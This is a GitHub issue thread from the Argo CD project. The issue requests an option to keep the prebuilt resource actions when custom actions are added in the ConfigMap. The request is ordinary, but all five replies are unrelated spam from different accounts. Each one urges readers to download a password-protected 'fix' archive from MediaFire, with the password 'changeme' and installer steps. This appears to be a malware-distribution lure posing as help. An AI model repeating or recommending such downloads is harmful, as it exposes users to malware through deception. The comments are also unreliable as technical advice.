### ISSUE TITLE
Allow pre-builtin actions with custom action

### ISSUE THREAD

**Issue by ashutosh16** [argoproj/argo-cd#19707]
# Summary
ArgoCD provides a single set of actions, either from [resource_customization](https://github.com/argoproj/argo-cd/tree/master/resource_customizations/argoproj.io/AnalysisRun/actions) or from overrides in the ConfigMap. If an ArgoCD operator wants to add any ad-hoc action, it will override the prebuilt actions. This behavior is valid since the override functionality is designed to replace existing actions. However, there are scenarios where a user might want to use both prebuilt actions and custom actions in the ConfigMap.

What change you think needs making.
Add flag in the resource action which when set true on the resources, will add all the actions

# Motivation
In ArgoCD, we want to add custom actions to the Rollout object to perform specific tasks. However, we also want to retain the prebuilt actions. Therefore, we need a way to include both the prebuilt actions and the custom actions specified in the overrides.

Please give examples of your use case, e.g. when would you use this.
Rollout actions

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
